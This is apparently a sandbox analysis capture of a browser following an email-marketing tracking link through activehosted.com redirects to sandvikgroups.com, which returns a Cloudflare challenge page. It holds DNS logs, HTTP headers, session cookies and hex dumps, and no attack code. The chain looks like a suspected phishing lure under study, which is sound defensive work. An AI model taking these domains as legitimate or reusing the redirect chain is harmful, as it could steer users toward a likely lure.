                                        Jan 7, 2025 22:05:49.792031050 CET6322753192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:49.798788071 CET53632271.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:49.798806906 CET53549861.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:51.745755911 CET5468553192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:51.746184111 CET4987853192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:51.759896040 CET53498781.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:51.759912014 CET53546851.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:52.581829071 CET5349653192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:52.581829071 CET5749153192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:52.590396881 CET53574911.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:52.590948105 CET53534961.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:53.377732992 CET6168953192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:53.378212929 CET5949353192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:53.386682034 CET53616891.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:53.389945030 CET53594931.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:54.476103067 CET6187353192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:54.476285934 CET6015953192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:54.482903004 CET53618731.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:54.484519005 CET53601591.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:57.831367016 CET5191453192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:57.831451893 CET5654953192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:57.836514950 CET6073753192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:57.838298082 CET53519141.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:57.838644028 CET53565491.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:57.838992119 CET6189453192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:57.850212097 CET53607371.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:58.024580002 CET53618941.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:58.575607061 CET6453253192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:58.575758934 CET6157953192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:58.582525015 CET53645321.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:58.582767963 CET53615791.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:59.213572025 CET5499353192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:59.213963032 CET5702453192.168.2.41.1.1.1
                                        Jan 7, 2025 22:05:59.220601082 CET53570241.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:59.220809937 CET53549931.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:02.489427090 CET138138192.168.2.4192.168.2.255
                                        Jan 7, 2025 22:06:04.263022900 CET53591251.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:22.509552956 CET5938953192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:22.509809017 CET5809153192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:22.516185045 CET53593891.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:22.517146111 CET53580911.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:23.123804092 CET4966553192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:23.123971939 CET6475153192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:23.130686045 CET53647511.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:23.130697966 CET53496651.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:23.417932034 CET53603381.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:24.266100883 CET53498221.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:45.550527096 CET53551721.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:45.735277891 CET53585661.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:54.480477095 CET5492153192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:54.480719090 CET5228153192.168.2.41.1.1.1
                                        Jan 7, 2025 22:06:54.487425089 CET53549211.1.1.1192.168.2.4
                                        Jan 7, 2025 22:06:54.487669945 CET53522811.1.1.1192.168.2.4
                                        TimestampSource IPDest IPChecksumCodeType
                                        Jan 7, 2025 22:05:58.025139093 CET192.168.2.41.1.1.1c27b(Port unreachable)Destination Unreachable
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 7, 2025 22:05:49.791850090 CET192.168.2.41.1.1.10x1701Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:49.792031050 CET192.168.2.41.1.1.10xd74dStandard query (0)www.google.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:51.745755911 CET192.168.2.41.1.1.10x49d6Standard query (0)juddshaw.acemlnc.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:51.746184111 CET192.168.2.41.1.1.10xdf65Standard query (0)juddshaw.acemlnc.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:52.581829071 CET192.168.2.41.1.1.10xba21Standard query (0)juddshaw.activehosted.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.581829071 CET192.168.2.41.1.1.10x2a3cStandard query (0)juddshaw.activehosted.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:53.377732992 CET192.168.2.41.1.1.10x1ea2Standard query (0)sandvikgroups.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:53.378212929 CET192.168.2.41.1.1.10xfbb2Standard query (0)sandvikgroups.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:54.476103067 CET192.168.2.41.1.1.10x90f7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:54.476285934 CET192.168.2.41.1.1.10x44c2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:57.831367016 CET192.168.2.41.1.1.10xae36Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.831451893 CET192.168.2.41.1.1.10xa178Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:57.836514950 CET192.168.2.41.1.1.10x1615Standard query (0)sandvikgroups.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.838992119 CET192.168.2.41.1.1.10xc49aStandard query (0)sandvikgroups.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:58.575607061 CET192.168.2.41.1.1.10xbc0aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:58.575758934 CET192.168.2.41.1.1.10x735aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:59.213572025 CET192.168.2.41.1.1.10x1616Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:59.213963032 CET192.168.2.41.1.1.10x1130Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:06:22.509552956 CET192.168.2.41.1.1.10xd2dbStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:22.509809017 CET192.168.2.41.1.1.10xa775Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:06:23.123804092 CET192.168.2.41.1.1.10x97d0Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:23.123971939 CET192.168.2.41.1.1.10x90d2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:06:54.480477095 CET192.168.2.41.1.1.10x8f0fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:54.480719090 CET192.168.2.41.1.1.10x5d23Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 7, 2025 22:05:49.798788071 CET1.1.1.1192.168.2.40xd74dNo error (0)www.google.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:49.798806906 CET1.1.1.1192.168.2.40x1701No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:51.759912014 CET1.1.1.1192.168.2.40x49d6No error (0)juddshaw.acemlnc.com54.225.69.136A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:51.759912014 CET1.1.1.1192.168.2.40x49d6No error (0)juddshaw.acemlnc.com54.235.205.181A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:51.759912014 CET1.1.1.1192.168.2.40x49d6No error (0)juddshaw.acemlnc.com54.82.80.250A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:51.759912014 CET1.1.1.1192.168.2.40x49d6No error (0)juddshaw.acemlnc.com34.237.253.202A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590396881 CET1.1.1.1192.168.2.40x2a3cNo error (0)juddshaw.activehosted.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590948105 CET1.1.1.1192.168.2.40xba21No error (0)juddshaw.activehosted.com104.17.203.31A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590948105 CET1.1.1.1192.168.2.40xba21No error (0)juddshaw.activehosted.com104.17.205.31A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590948105 CET1.1.1.1192.168.2.40xba21No error (0)juddshaw.activehosted.com104.17.202.31A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590948105 CET1.1.1.1192.168.2.40xba21No error (0)juddshaw.activehosted.com104.17.204.31A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:52.590948105 CET1.1.1.1192.168.2.40xba21No error (0)juddshaw.activehosted.com104.17.206.31A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:53.386682034 CET1.1.1.1192.168.2.40x1ea2No error (0)sandvikgroups.com188.114.96.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:53.386682034 CET1.1.1.1192.168.2.40x1ea2No error (0)sandvikgroups.com188.114.97.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:53.389945030 CET1.1.1.1192.168.2.40xfbb2No error (0)sandvikgroups.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:54.482903004 CET1.1.1.1192.168.2.40x90f7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.838298082 CET1.1.1.1192.168.2.40xae36No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.838298082 CET1.1.1.1192.168.2.40xae36No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.838644028 CET1.1.1.1192.168.2.40xa178No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:57.850212097 CET1.1.1.1192.168.2.40x1615No error (0)sandvikgroups.com188.114.97.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:57.850212097 CET1.1.1.1192.168.2.40x1615No error (0)sandvikgroups.com188.114.96.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:58.024580002 CET1.1.1.1192.168.2.40xc49aNo error (0)sandvikgroups.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:58.582525015 CET1.1.1.1192.168.2.40xbc0aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:58.582525015 CET1.1.1.1192.168.2.40xbc0aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:58.582767963 CET1.1.1.1192.168.2.40x735aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:59.220601082 CET1.1.1.1192.168.2.40x1130No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:05:59.220809937 CET1.1.1.1192.168.2.40x1616No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:05:59.220809937 CET1.1.1.1192.168.2.40x1616No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:22.516185045 CET1.1.1.1192.168.2.40xd2dbNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:22.516185045 CET1.1.1.1192.168.2.40xd2dbNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:22.517146111 CET1.1.1.1192.168.2.40xa775No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:06:23.130686045 CET1.1.1.1192.168.2.40x90d2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 22:06:23.130697966 CET1.1.1.1192.168.2.40x97d0No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:23.130697966 CET1.1.1.1192.168.2.40x97d0No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 22:06:54.487425089 CET1.1.1.1192.168.2.40x8f0fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                        • juddshaw.acemlnc.com
                                        • juddshaw.activehosted.com
                                        • sandvikgroups.com
                                        • a.nel.cloudflare.com
                                        • https:
                                          • challenges.cloudflare.com
                                        • cdnjs.cloudflare.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44974054.225.69.1364435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:52 UTC740OUTGET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1
                                        Host: juddshaw.acemlnc.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:52 UTC328INHTTP/1.1 307 Temporary Redirect
                                        cache-control: public, max-age=2628000
                                        location: https://juddshaw.activehosted.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw
                                        date: Tue, 07 Jan 2025 21:05:52 GMT
                                        content-length: 0
                                        x-envoy-upstream-service-time: 1
                                        server: istio-envoy
                                        connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449742104.17.203.314435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:53 UTC745OUTGET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1
                                        Host: juddshaw.activehosted.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:53 UTC1203INHTTP/1.1 302 Found
                                        Date: Tue, 07 Jan 2025 21:05:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        location: https://sandvikgroups.com/?cono
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        pragma: no-cache
                                        Set-Cookie: PHPSESSID=2fecf0125781b33d31f64d2ffcd6cd91; path=/; secure; HttpOnly; SameSite=Lax
                                        x-content-type-options: nosniff
                                        x-privacy-policy: You can find our privacy policy here: https://www.activecampaign.com/help/privacy-policy/
                                        x-request-id: 7e5309f2443141d1f971fb023b29b505
                                        x-robots-tag: noindex
                                        CF-Cache-Status: DYNAMIC
                                        Set-Cookie: cmp652497115=8d0b7ede170208f0b44e002e53875116; expires=Thu, 06-Feb-2025 21:05:53 GMT; Max-Age=2592000; path=/; domain=.juddshaw.activehosted.com; secure; SameSite=Lax
                                        Set-Cookie: __cf_bm=UUUeLQDQdlijINbz4dlpy64aILUWtnS_rwpD8HZJA9M-1736283953-1.0.1.1-Ey17XGAkkE89fHbEIfnxM87SHKRpyukEmmHNwNL11pS_uFwxoQF4dZ7JLqjE4SFMqJouRqeF3aonlEBvwtp8gw; path=/; expires=Tue, 07-Jan-25 21:35:53 GMT; domain=.activehosted.com; HttpOnly; Secure; SameSite=None
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8933bc40f3f-EWR


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449744188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:54 UTC665OUTGET /?cono HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:54 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:05:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:05:54 UTC963INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 77 43 58 73 62 55 59 38 50 75 7a 56 2f 35 77 67 38 76 62 53 4a 77 61 46 4d 70 57 6e 49 76 63 74 33 6a 6f 72 6d 38 4d 57 70 52 4f 66 55 30 63 6a 47 35 36 55 65 66 37 76 64 34 2f 45 43 79 30 6b 50 77 48 51 6c 64 43 6c 69 32 6f 69 44 39 44 6f 69 41 43 63 72 43 4e 4a 72 42 6b 41 66 4a 39 55 33 58 7a 7a 37 41 55 62 36 72 52 65 64 43 6f 32 49 78 6b 6d 36 65 34 76 46 4c 79 6e 74 6b 6c 44 76 75 54 4d 34 50 49 69 44 71 32 75 4a 38 5a 77 41 34 73 65 6a 51 3d 3d 24 51 33 71 35 4b 41 7a 56 47 53 51 33 68 76 6b 30 78 41 2b 32 4c 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: wCXsbUY8PuzV/5wg8vbSJwaFMpWnIvct3jorm8MWpROfU0cjG56Uef7vd4/ECy0kPwHQldCli2oiD9DoiACcrCNJrBkAfJ9U3Xzz7AUb6rRedCo2Ixkm6e4vFLyntklDvuTM4PIiDq2uJ8ZwA4sejQ==$Q3q5KAzVGSQ3hvk0xA+2Lw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:05:54 UTC490INData Raw: 32 30 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 208c<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:05:54 UTC1369INData Raw: 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d
                                        Data Ascii: ,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@m
                                        2025-01-07 21:05:54 UTC1369INData Raw: 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 73 61 6e 64 76 69 6b 67 72 6f 75 70 73 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 63 52 61 79 3a 20 27 38 66 65 36 65 38 39 62 31 66 64 34 34 33 36 37 27 2c 63 48 3a 20 27 53 30 56 62 39 66 62 76 43 4c 4b 5a
                                        Data Ascii: ="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "sandvikgroups.com",cType: 'interactive',cRay: '8fe6e89b1fd44367',cH: 'S0Vb9fbvCLKZ
                                        2025-01-07 21:05:54 UTC1369INData Raw: 31 30 5f 39 39 4e 65 37 36 38 76 57 79 6c 51 50 6a 33 31 37 57 6e 52 4a 35 78 31 76 61 37 68 39 56 68 78 39 79 52 6f 54 4c 46 61 6d 79 6b 6b 7a 52 43 7a 56 79 45 43 71 64 4f 6d 6f 6f 79 79 51 35 74 55 2e 6e 37 69 33 4b 52 54 42 70 36 32 55 39 52 52 50 45 69 48 6a 49 51 6f 51 57 68 6e 69 74 75 45 57 34 46 57 63 69 70 73 65 69 4b 4a 6d 38 32 55 57 62 71 71 77 71 44 62 73 75 4f 4e 37 6e 41 46 42 4d 4f 43 6f 42 55 4d 76 64 38 39 31 65 34 5a 41 68 5f 45 36 59 42 6f 45 30 46 32 4f 4b 79 32 52 53 47 70 54 71 73 37 4c 7a 6d 52 64 52 54 78 64 54 4f 63 30 58 48 6f 5f 79 4d 42 6f 4a 6d 41 51 69 4a 6b 49 32 49 52 65 59 6e 43 56 79 61 78 68 63 78 71 56 46 58 32 74 59 6a 79 4c 4c 46 6a 69 54 4c 76 6a 48 6d 75 71 56 6a 39 6d 44 30 37 73 65 51 58 5a 63 74 4f 78 71 45 55
                                        Data Ascii: 10_99Ne768vWylQPj317WnRJ5x1va7h9Vhx9yRoTLFamykkzRCzVyECqdOmooyyQ5tU.n7i3KRTBp62U9RRPEiHjIQoQWhnituEW4FWcipseiKJm82UWbqqwqDbsuON7nAFBMOCoBUMvd891e4ZAh_E6YBoE0F2OKy2RSGpTqs7LzmRdRTxdTOc0XHo_yMBoJmAQiJkI2IReYnCVyaxhcxqVFX2tYjyLLFjiTLvjHmuqVj9mD07seQXZctOxqEU
